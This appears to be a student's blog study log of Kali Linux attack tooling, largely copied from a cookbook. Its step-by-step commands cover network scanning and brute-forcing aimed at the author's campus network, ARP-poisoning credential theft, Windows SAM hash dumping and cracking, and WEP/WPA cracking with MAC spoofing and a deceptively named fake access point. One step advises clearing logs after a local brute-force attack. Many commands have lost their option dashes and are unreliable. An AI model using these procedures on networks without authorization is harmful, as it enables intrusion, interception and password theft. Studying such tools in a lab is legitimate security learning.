Kali Linux——迈向网络攻防

  自从进入大三的课程后,在已学的高数、线代、数论、概率论、信息论、通信等知识的技术上,开始了网络信息安全、网      络攻防的学习。俗话说得好,磨刀不误砍柴工,开始网络攻防之旅也势必要一个好的工具。然而,事实告诉我们,这不是一个工具的问题,是一大片的工具。这???

  偶然的机会,才得知安装Kali Linux,可以解决大部分的工具获取难题,还未安装的工具在此基础上进行安装即可。

Kali Linux

        Kali Linux是基于Debian的Linux发行版, 设计用于数字取证操作系统。由Offensive Security Ltd维护和资助。最先由Offensive Security的Mati Aharoni和Devon Kearns通过重写BackTrack来完成,BackTrack是他们写的用于取证的Linux发行版 。

        Kali Linux预装了许多渗透测试软件,包括nmap 、Wireshark 、John the Ripper,以及Aircrack-ng.[2] 用户可通过硬盘、live CD或live USB运行Kali Linux。Kali Linux既有32位和64位的镜像。可用于x86 指令集。同时还有基于ARM架构的镜像,可用于树莓派和三星的ARM Chromebook。

       目前Kali Linux的最新版本为2018.3,增加了对RTL8812AU网卡的支持。                                                                                                                                                                                                                             (摘自百度百科)

以下是我的系统学习记录:

Kali安装参考:https://blog.csdn.net/u012318074/article/details/71601382/

Kali系统功能初步学习参考:https://gitee.com/wizardforcel/kali-linux-cookbook-zh/tree/master

I网络配置     

        开始的时候在共享模式(MAC OS下Parallels Desktop中的网络模式)下,Kali Linux直接可以上网。但是嗅探了两天终于醒悟,我在搞自己啊。

        在此,因为用的是无线网,所以在此模式下推荐桥接模式(选择默认适配器)  

  在虚拟机中,需要配置网络文件,可DHCP,也可使用静态,后边的麻烦一点,但出问题比较少。

  另外还需要修改DNS,并重启网卡。

   因为在这边花了巨量时间,我还是好好写一下吧,本人郑重承诺,以下是背出来的:

    首先,设定虚拟机的ip地址,

      (1)在主机终端获取主机ip、网关、子网掩码;

      (2)打开Kali Linux终端;

      (3)键入 vim /etc/network/interfaces;

      (4)填写子网掩码、网关,ip取同一子网下不同于主机的ip;

    然后,设置DNS

      (1)vim  /etc/resolv.conf

      (2)nameserver 8.8.8.8

        nameserver 10.10.10.10

        建议直接找一下主机的DNS

    最后,重启网卡:  /etc/init.d/networking restart

2.定制Kali Linux   技术文档参考

        准备内核头文件:打开Terminal, 输入apt-get update,升级发行

2.信息收集

  I服务

    (1使用DNSenum进行DNS举,打开Gnome终端

    

    

获取信息输出,例如主机、名称服务器、邮件服务器

 

(2)snmpwalk来检测Windows主机。Snmpwalk是一个使用SNMP GETNEXT请求在网络实体中查询信息树的SNMP应用。

 

    snmpwalk -c public 192.168.10.200 -v 1 | grep tcpConnState |  cut -d"." -f6 | sort –nu

    (3)snmpcheck的使用

    (4)使用fierce,这是一个尝试多种技术来寻找所有目标所用的IP地址和域名     

 

        

         

  II判断网络范围            

 

III识别活动主机

  以南京邮电大学校园网为例  

  1.使用Nmap  

    

  2.使用Hping可以显示更为详细的结果 

    

  3.也可向指定端口发送一些十六字节的数据

     

IV寻找开放端口 

      

    nmap -p 1-1000 192.168.56.101还可以指定端口范围

    指定Nmap来扫描某个组织所有网络的TCP 22端口

      

    以特定格式进行输出:

      

    NmapGUI版本叫做Zenmap,它可以通过在终端上执行zenmap命令

V操作系统指纹识别

    

VI服务指纹识别

    

   也可以使用amap来识别运行在特定端口或端口范围内的应用

VII Maltego风险评估

  访问https://www.paterva.com/web6/community/来注册账号

   使用Maltego的特殊Kali版本,它可以在信息收集阶段协助我们,通过将获得的信息以易于理解的形式展示。Maltego是开源的风险评估工具,被设计用来演示网络上故障单点的复杂性和严重性。它也具有从内部和外部来源聚合信息来提供简洁的风险图表的能力。

   

    选择transform seed设置,之后点击Next

    这个向导在跳到下个页面之前会执行多次操作。完成之后,选择Open a blank graph and let me play around并点击Finish

    最开始,将Domain实体从Palette组件拖放到New Graph标签页中。

    通过点击创建的Domain实体来设置目标域名,并且编辑Property View中的Domain Name属性。

    目标一旦设置好,我们就可以开始收集信息了。最开始,右键点击创建的Domain实体,并且选择Run Transform来显示可用的选项

    选择查找DNS名称,执行WHOIS查询,获得邮件地址,以及其它。或者我们还可以选择运行下面展示的全部转换。

    可以通过在链接的子节点上执行相同操作,来获得更多信息,直到我们找到了想要的信息。

VIII 映射网络的建立

  使用Casefile

3.漏洞评估

  安装、配置和启动Nessus

  网址:https://www.tenable.com/downloads/nessus

  选择下载Nessus6.5.4,文件现在在Keyone的百度云盘里面。

  

   安装:dpkg -i “文件名”  

      

  之后的检查和评估操作参考:https://gitee.com/wizardforcel/kali-linux-cookbook-zh/blob/master/ch5.md

  OpenVAS开放漏洞评估系统,是一个用于评估目标漏洞的杰出框架OpenVAS 默认安装,并且只需要配置便于使用。仍旧见上网址。

 

3.漏洞利用

  安装和配置Metasploitable,这是一个像虚拟机一样的东东,有待进一步研究呢。

  https://gitee.com/wizardforcel/kali-linux-cookbook-zh/blob/master/ch6.md

4.权限提升

  实验环境仍旧是上面的虚拟机

  https://gitee.com/wizardforcel/kali-linux-cookbook-zh/blob/master/ch7.md

5.密码攻击

  使用hydra,这里我们打开图形界面 

    

    

  做一些调整。在Performance Options(执行选项)下面,我们将任务数量从 16 设置为 原因是我们不打算让这么多进程运行,这样会使服务器崩溃。虽然它是可选的,我们也希望选择Exit after first found pair(在首次发现匹配之后退出)选项。

  设置我们的目标,在Target标签下选择Single Target,并输入目标ip

  点击Start即可开始攻击

获得路由访问——使用Medusa

     

-M http允许我们指定模块。这里,我们选择了 HTTP 模块。

-h 192.168.10.1允许我们指定主机。这里,我们选择了192.168.10.1(路由的 IP 地址)。

-u admin允许我们指定用户。这里我们选择了admin

-P [location of password list]允许我们指定密码列表的位置。

-e ns允许我们指定额外的密码检查。ns变量允许我们使用用户名作为密码,并且使用空密码。

-n 80允许我们指定端口号码。

-F允许我们在成功找到用户名密码组合之后停止爆破。

虽然在不了解学校管理员信息情况下,爆破必然失败,但是我们在查看22端口时,发现了SSH协议的版本,前往绿盟漏洞:http://www.nsfocus.net/index.php?act=sec_bug#

  查看有无攻击方法

    

漏洞来源文档:https://seclists.org/oss-sec/2018/q3/180

   密码分析:使用Ettercap

 

 

  

 

 

  原理:使用Ettercap 来毒化网络并偷取网络上的用户名和密码。我们以寻找和修改 Ettercap 的配置文件来开始。之后我们启动了 Ettercap 并使用 ARP 毒化执行中间人(MITM)攻击。由于流量被重定向到我们的主机,当用户名和密码在网络上传播时,我们就能够看到它们。

  进一步的密码攻击可参考:http://www.freebuf.com/articles/web/5929.html

 

 使用msfconsole

终端输入msfconsole

     

     

     

使用John the Ripper 破解 Windows 密码

 

这个秘籍中,我们会使用John the Ripper 来破解 Windows 安全访问管理器(SAM)文件。SAM文件储存了目标系统用户的用户名和密码的哈希。出于安全因素,SAM文件使用授权来保护,并且不能在 Windows 系统运行中直接手动打开或复制。

 

准备

你将会需要访问SAM 文件。

 

这个秘籍中,我们假设你能够访问某台Windows 主机。

 

操作步骤

 

让我们开始使用John the Ripper 破解 Windows SAM 文件。我们假设你能够访问某台 Windows 主机,通过远程入侵,或者物理接触,并且能够通过 USB 或 DVD 驱动器启动 Kali Linux

 

看看你想挂载哪个硬盘:

 

Fdisk -l

挂载该硬盘,并将target设为它的挂载点。

 

mount /dev/sda1 /target/ 

将目录改为Windows SAM 文件的位置:

 

cd /target/windows/system32/config 

列出目录中所有内容。

 

ls al

使用SamDump2 来提取哈希,并将文件放到你的 root 用户目录中的一个叫做hashes的文件夹中。

 

samdump2 system SAM > /root/hashes/hash.txt

将目录改为John the Ripper 所在目录。

 

运行John the Ripper

 

./john /root/hashes/hash.txt 

./john /root/hashes/hash.txtf:nt  (If attacking a file on a NTFS System) 

 

字典攻击:

使用crunch

使用Crunch 生成密码的基本语法是,[minimum length] [maximum length] [character set] [options]

-o:这个选项允许你指定输出列表的文件名称和位置

-b:这个选项允许你指定每个文件的最大字节数。大小可以以 KB/MB/GB 来指定,并且必须和-o START触发器一起使用。

-t:这个选项允许你指定所使用的模式。

-l:在使用-t选项时,这个选项允许你将一些字符标识为占位符(@%^)。

执行命令来在桌面上创建密码列表,它最少个字母,最大 10 个字符,并且使用字符集ABCDEFGabcdefg0123456789

crunch 8 10 ABCDEFGabcdefg0123456789 o /root/Desktop/ generatedCrunch.txt

 

    

nano打开文件 

    

就这样,我们使用了Crunch 来生成密码字典列表

     

使用彩虹表

    使用RainbowCrack 来生成彩虹表 

    

彩虹表生成完毕需要2-7个小时,最后生成.rt文件。为了破解密码的方便,生成完毕后,使用rtsort程序对彩虹表排序,使其更加易于使用。

 

 使用英伟达统一计算设备架构(CUDA)

打开终端窗口并将目录改为OclHashcat-plus 所在目录。

cd /usr/share/oclhashcat-plus

执行下列命令来启动CudaHashcat-plus 的帮助文件:

./cudaHashcat-plus.bin help 

运行CudaHashcat 的语法是cudaHashcat-plus.bin [options] hash [mask]

使用OclHashcat 的重点之一是理解它的字符集结构。

先看看一些可用的攻击向量。CudaHashcat 在攻击中使用左右掩码。密码的字符按照掩码划分,并且被均分为左和右掩码。对于每个掩码,你可以为其指定字典或字符集。出于我们的目的,我们会使用定制的字符集。

为了指定自定义字符集,我们使用1选项。我们可以设置任意多的自定义字符集,只要为它们指定一个数值(1-n)。每个自定义字符都由问号(?)来表示,并且随后是字符类型。可用的选择是:

d指定数字(0~9

l指定小写字母

u指定大写字母

s指定特殊字符

1-n指定用做占位符的自定义字符集。

这样将它们组合起来,我们就指定了一个自定义字符集,它包括特殊字符(s),大写字母(u),小写字母(l)和数字(d),生成长度为 的密码。我们打算指定叫做attackfile的哈希表。

./cudaHashcat-plus.bin attackfile -1 ?l?u?d?s ?1?1?1?1 ?1?1?1?1

将这个命令这样拆分:

./cudaHashcat-plus.bin调用了 CudaHashcat 

attackfile是攻击文件。

-1 ?l?u?d?指定了自定义字符集1,它包含小写字母、大写字母、数字和特殊字符。

?1?1?1?1是使用字符集1的左掩码。

?1?1?1?1是使用字符集1的右掩码。

使用ATI Stream

这个秘籍中,我们会使用ATI Stream 来破解密码哈希。ATI Stream 类似于 CUDA,因为它是一个并行计算平台,它可以通过利用 GPU 的能力来提升计算性能。随着时间的流逝,GPU 的处理能力有了戏剧性的提升,这让我们能够将它用于计算目的。出于演示目的,我们使用 OclHashcat-plus 来破解密码。OclHashcat 有两种版本:plus 和 lite。两个都包含在 Kali 中。

 

 

使用OclHashcat-plus 

打开终端窗口并将目录改为OclHashcat-plus 所在目录

cd /usr/share/oclhashcat-plus 

执行下列命令来启动OclHashcat-plus 的帮助文件:

./oclHashcat-plus.bin help 

运行OclHashcat 的语法是oclHashcat-plus.bin [options] hash [mask]

 OclHashcat 的重点之一是理解它的字符集结构。

在我们开始攻击之前,让我们先看看一些可用的攻击向量。OclHashcat 在攻击中使用左右掩码。密码的字符按照掩码划分,并且被均分为左和右掩码。对于每个掩码,你可以为其指定字典或字符集。出于我们的目的,我们会使用定制的字符集。

为了指定自定义字符集,我们使用1选项。我们可以设置任意多的自定义字符集,只要为它们指定一个数值(1-n)。每个自定义字符都由问号(?)来表示,并且随后是字符类型。可用的选择是:

 d指定数字(0~9

l指定小写字母

u指定大写字母

s指定特殊字符

1-n指定用做占位符的自定义字符集。

这样将它们组合起来,我们就指定了一个自定义字符集,它包括特殊字符(s),大写字母(u),小写字母(l)和数字(d),生成长度为 的密码。我们打算指定叫做attackfile的哈希表。

./oclHashcat-plus.bin attackfile -1 ?l?u?d?s ?1?1?1?1 ?1?1?1?1

我们可以将这个命令这样拆分:

./oclHashcat-plus.bin调用了 OclHashcat 

attackfile是我们的攻击文件。

-1 ?l?u?d?指定了自定义字符集1,它包含小写字母、大写字母、数字和特殊字符。

?1?1?1?1是使用字符集1的左掩码。

?1?1?1?1是使用字符集1的右掩码。

物理访问攻击

这个秘籍中,我们会使用SUCrack 来执行物理访问密码攻击。 SUCrack 是个多线程的工具,能够通过su来执行本地用户账户的暴力破解。Linux su命令允许你作为替代用户来运行命令。这个攻击,虽然在你不能通过其他手段提权 Linux 系统时非常有用,但是会填满日志文件,所以请确保在完成之后清理这些日志。

SUCrack 拥有几种备选的可用命令:

--help允许你查看它的帮助文档。

-l允许你修改我们尝试绕过登录的用户。

-s允许你设置展示统计信息的秒数间隔。默认值为 秒。

-a允许你设置是否使用 ANSI 转义代码。

-w允许你设置工作线程的数量。由于 SUCrack 是多线程的,你可以运行任意多的线程。我们推荐你只使用一个线程,因为每次失败的登录尝试在尝试下个密码之前通常有三秒的延迟。

操作步骤

为了使用SUCrack,你需要在启动时指定单词列表。否则,你会得到一条搞笑的信息。打开终端窗口并执行sucrack命令。出于我们的目的,我们会使用之前创建的自定义单词列表文件,它由 Crunch 生成。但是,你可以指定任何希望的单词列表。 

sucrack /usr/share/wordlists/rockyou.txt

如果你打算设置两个工作线程,以及每秒显示一次统计信息,并且使用 ANSI 转义代码,你可以使用下列命令: 

sucrack w 2 s 6 a /usr/share/wordlists/rockyou.txt 

使用SUCrack 来对系统的 root 用户执行物理访问密码攻击。使用单词列表的攻击可以对管理员(默认)或特定用户指定。我们运行sucrack命令,它为我们执行攻击。

 

7.无线攻击

 为了执行这个秘籍中的任务,需要Kali 终端窗口的经验。也需要受支持的配置好的无线网卡,用于封包注入。在无线网卡的例子中,封包注入涉及到发送封包,或将它注入到双方已经建立的连接中。请确保你的无线网卡允许封包注入,因为并不是所有无线网卡都支持它。

https://blog.csdn.net/chenyiyue/article/details/52516395  Kali Linux安装无线网卡驱动

使用AirCrack 来破解WEP 加密的网络会话。

interface列下,选择你的接口之一。这里,我们使用wlan0。如果你的接口不同,例如mon0,将每个提到wlan0的地方都换成它。

下面,我们需要停止wlan0接口,并把它关闭,便于我们接下来修改 MAC 地址。

airmon-ng stop 

ifconfig wlan0 down

下面,需要修改接口的MAC 地址。由于机器的 MAC 地址会在任何网络上标识你的存在,修改机器的标识允许我们隐藏真正的 MAC 地址。这里,我们使用00:11:22:33:44:55

macchanger --mac 00:11:22:33:44:55 wlan0 

现在我们需要重启airmon-ng

airmon-ng start wlan0

使用airodump来定位附近的可用无线网络

airodump-ng wlan0 

这会出现可用无线网络的列表。一旦你找到了你想要攻击的网络,按下Ctrl + C来停止搜索。选中BSSID列中的 MAC 地址,右击你的鼠标,并且选择复制。同时,把网络正在发送哪个频道的信号记录下载。你会在Channel列中找到这个信息。这里,这个频道是10

现在运行airodump,并且将所选BSSID的信息复制到文件中。我们会使用下列选项:

-c允许我们选择频道。这里我们选择10

-w允许我们选择文件名称。这里我们选择wirelessattack

-bssid允许我们选择我们的BSSID。这里,我们从剪贴板上粘贴09:AC:90:AB:78

airodump-ng c 10 w wirelessattack --bssid 09:AC:90:AB:78 wlan0 

新的窗口会打开,并展示这个命令的输出。保持这个窗口开着。

打开另一个终端窗口,为了尝试组合它们,我们运行aireplay。它拥有下列语法:aireplay-ng -1 0 a [BSSID] h [our chosen MAC address] e [ESSID] [Interface]

aireplay-ng -1 0 -a 09:AC:90:AB:78 h 00:11:22:33:44:55 e backtrack wlan0

下面,我们发送一些流量给路由器,便于捕获一些数据。我们再次使用aireplay,以下列格式:aireplay-ng -3 b [BSSID] – h [Our chosen MAC address] [Interface]

aireplay-ng -3 b 09:AC:90:AB:78 h 00:11:22:33:44:55 wlan0

你的屏幕会开始被流量填满。将它运行一到两分钟,直到你拥有了用来执行破解的信息。

最后我们运行AirCrack 来破解 WEP 密码。

aircrack-ng b 09:AC:90:AB:78 wirelessattack.cap 

这就结束了。

使用AirCrack 套件来破解无线网络的 WEP 密码。AirCrack 是最流行的 WEP 破解工具之一。AirCrack 通过收集 WEP 无线连接的封包来工作,之后它会通过算术分析数据来破解 WEP 加密密码。我们通过启动 AirCrack 并选择我们想要的接口来开始。下面,我们修改了 MAC 地址,这允许我们修改互联网上的身份,之后使用airodump搜索可用的无线网络来攻击。一旦我们找到了打算攻击的网络,我们使用aireplay来将我们的机器与正在攻击的无线设备的 MAC 地址关联。我们最后收集到了一些流量,之后暴力破解生成的 CAP 文件来获得无线密码。

因连接网络的原因,导致未能找到目标,后面连接好了之后在进行,可继续参考博客:

https://www.cnblogs.com/daoyi/p/Kali-Linux-shi-yongAircrack-po-jiewifi-mi-ma-wpawp.html

https://blog.csdn.net/code_thinking/article/details/50589508 

校园网不支持这么做吗。

等以后继续探究一下

WPA/WPA2 无线网络破解

WPA(无线保护访问)于 2003 年诞生,并且为保护无线网络和取代过时的旧标准 WEP 而创建。WEP 被 WPA 以及之后的 WPA2 代替。由于存在更加安全的协议,WEP 很少使用了。

 

这个秘籍中,我们会使用AirCrack 套件来破解 WPA 密码。 AirCrack 套件(或 AirCrack NG)是 WEP 和 WPA 密码破解程序,它抓取网络封包,分析它们,并使用这些数据破解 WPA 密码。

 

准备

 

为了执行这个秘籍中的任务,需要Kali 终端窗口的经验。也需要受支持的配置好的无线网卡,用于封包注入。在无线网卡的例子中,封包注入涉及到发送封包,或将它注入到双方已经建立的连接中。

 

操作步骤

 

让我们开始使用AirCrack 来破解WEP 加密的网络会话。

 

打开终端窗口,并产生无线网络接口的列表:

 

airmon-ng

 

 

interface列下,选择你的接口之一。这里,我们使用wlan0。如果你的接口不同,例如mon0,请将每个提到wlan0的地方都换成它。

 

下面,我们需要停止wlan0接口,并把它关闭,便于我们接下来修改 MAC 地址。

 

airmon-ng stop 

ifconfig wlan0 down

下面,我们需要修改我们接口的MAC 地址。由于机器的 MAC 地址会在任何网络上标识你的存在,修改机器的标识允许我们隐藏真正的 MAC 地址。这里,我们使用00:11:22:33:44:55

 

macchanger --mac 00:11:22:33:44:55 wlan0 

现在我们需要重启airmon-ng

 

airmon-ng start wlan0

下面,我们会使用airodump来定位附近的可用无线网络。

 

airodump-ng wlan0 

这会出现可用无线网络的列表。一旦你找到了你想要攻击的网络,按下Ctrl + C来停止搜索。选中BSSID列中的 MAC 地址,右击你的鼠标,并且选择复制。同时,把网络正在发送哪个频道的信号记录下载。你会在Channel列中找到这个信息。这里,这个频道是10

 

现在运行airodump,并且将所选BSSID的信息复制到文件中。我们会使用下列选项:

 

-c允许我们选择频道。这里我们选择10

 

-w允许我们选择文件名称。这里我们选择wirelessattack

 

-bssid允许我们选择我们的BSSID。这里,我们从剪贴板上粘贴09:AC:90:AB:78

 

airodump-ng c 10 w wirelessattack --bssid 09:AC:90:AB:78 wlan0 

新的窗口会打开,并展示这个命令的输出。保持这个窗口开着。

 

打开另一个终端窗口,为了尝试组合它们,我们运行aireplay。它拥有下列语法:aireplay-ng -1 0 a [BSSID] h [our chosen MAC address] e [ESSID] [Interface]

 

Aireplay-ng --deauth 1 a 09:AC:90:AB:78 c 00:11:22:33:44:55 wlan0 

最后我们运行AirCrack 来破解 WEP 密码。-w选项允许我们指定单词列表的位置。我们使用事先命名的.cap文件。这里,文件名称是wirelessattack.cap

 

Aircrack-ng w ./wordlist.lst wirelessattack.cap

这就结束了。

 

工作原理

 

在这个秘籍中,我们使用了AirCrack 套件来破解无线网络的 WPA 密码。AirCrack 是最流行的 WPA 破解工具之一。AirCrack 通过收集 WPA 无线连接的封包来工作,之后它会通过算术分析数据来破解 WPA 加密密码。我们通过启动 AirCrack 并选择我们想要的接口来开始。下面,我们修改了 MAC 地址,这允许我们修改互联网上的身份,之后使用airodump搜索可用的无线网络来攻击。一旦我们找到了打算攻击的网络,我们使用aireplay来将我们的机器与正在攻击的无线设备的 MAC 地址关联。我们最后收集到了一些流量,之后暴力破解生成的 CAP 文件来获得无线密码。

 无线网络自动化破解

使用Gerix 将无线网络攻击自动化

 

使用wget,访问下面的网站并下载 Gerix

wget https://bitbucket.org/Skin36/gerix-wifi-cracker-pyqt4/ downloads/

gerix-wifi-cracker-master.rar

 

文件下载好之后,我们需要从RAR 文件中解压数据。

unrar x gerix-wifi-cracker-master.rar

 

现在,为了保持文件一致,将Gerix 文件夹移动到/usr/share目录下,和其它渗透测试工具放到一起。

mv gerix-wifi-cracker-master /usr/share/gerix-wifi-cracker

 

访问Gerix 所在的目录:

cd /usr/share/gerix-wifi-cracker

 

键入下列命令来启动Gerix

python gerix.py

 

 

点击Configuration(配置)标签页。

Configuration标签页中,选择你的无线接口。

点击Enable/Disable Monitor Mode(开启/停止监控器模式)按钮。

在监控模式启动之后,在Select Target Network(选择目标网络)下面,点击Rescan Networks(重新扫描网络)按钮。

目标网络的列表会填满。选择无线网络作为目标。这里,我们选择了WEP 加密的网络。

点击WEP 标签页

 

Functionalities(功能)中,点击Start Sniffing and Logging(开启嗅探和记录)按钮。

 

点击WEP Attacks (No Client)WEP 攻击 无客户端)子标签页。

点击Start false access point authentication on victim(开启目标上的伪造接入点验证)按钮。

点击Start the ChopChop attack(开始断续攻击)按钮。

在打开的终端窗口中,对Use this packet(使用这个封包)问题回答Y

完成之后,复制生成的.cap文件。

点击Create the ARP packet to be injected on the victim access point(创建注入到目标接入点的 ARP 封包)按钮。

点击Inject the created packet on victim access point(将创建的封包注入到目标接入点)按钮。

在打开的终端窗口中,对Use this packet问题回答Y

收集了大约20000 个封包之后,点击Cracking(破解)标签页。

点击Aircrack-ng – Decrypt WEP Password(解密 WEP 密码)按钮。

这就结束了。

使用伪造接入点连接客户端

点击Configuration(配置)标签页。

 

Configuration标签页中,选择你的无线接口。

 

点击Enable/Disable Monitor Mode(开启/停止监控器模式)按钮。

 

在监控模式启动之后,在Select Target Network(选择目标网络)下面,点击Rescan Networks(重新扫描网络)按钮。

 

目标网络的列表会填满。选择无线网络作为目标。这里,我们选择了WEP 加密的网络。

 

点击Fake AP(伪造接入点)标签页。

 

 

修改Access Point ESSID(接入点 ESSID),将其从honeypot修改为不会引起怀疑的名称。这里我们使用personalnetwork

 

其它选项使用默认。为了开启伪造接入点,点击Start Face Access Point(开启伪造接入点)按钮。

 

URL流量控制

这个类似中间人攻击

打开终端窗口并执行下面的命令,来配置IP 表使我们能够劫持流量:

sudo echo 1 >> /proc/sys/net/ipv4/ip_forward

下面,我们启动arpspoof 来毒化从受害者主机到默认网关的流量。这个例子中,我们在局域网中使用 Windows 7 主机,地址为192.168.10.115Arpspoof 有一些选项,包括:

-i允许我们选择目标接口。这里我们选择wlan0

-t允许我们指定目标。

整个命令的语法是arpspoof i [interface] t [target IP address] [destination IP address]

sudo arpspoof i wlan0 -t 192.168.10.115 192.168.10.1

接着,我们执行另一个arpspoof 命令,它会从上一个命令的目的地(这里是默认网关)取回流量,并使流量经过我们的 Kali 主机。这个例子中,我们的 IP 地址是192.168.10.110

sudo arpspoof i wlan0 -t 192.168.10.1 192.168.10.110 

 

端口重定向

打开终端窗口并执行下列命令来配置IP 表,使我们能够劫持流量:

 

Sudo echo 1 >> /proc/sys/net/ipv4/ip_forward

下面,我们启动arpspoof 来毒化去往默认网关的流量。这个例子中,默认网关的 IP 地址为 192.168.10.1Arpspoof 有一些选项,包括:

 

-i允许我们选择目标接口。这里我们选择wlan0

整个命令的语法是arpspoof i [interface] [destination IP address]

sudo arpspoof i wlan0 192.168.10.1

接着,我们执行另一个arpspoof 命令,它会从上一个命令的目的地(这里是默认网关)取回流量,并使流量经过我们的 Kali 主机。这个例子中,我们的 IP 地址是192.168.10.110

 

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

posted @ 2018-10-23 11:10  WittPeng  阅读(2278)  评论(0编辑  收藏  举报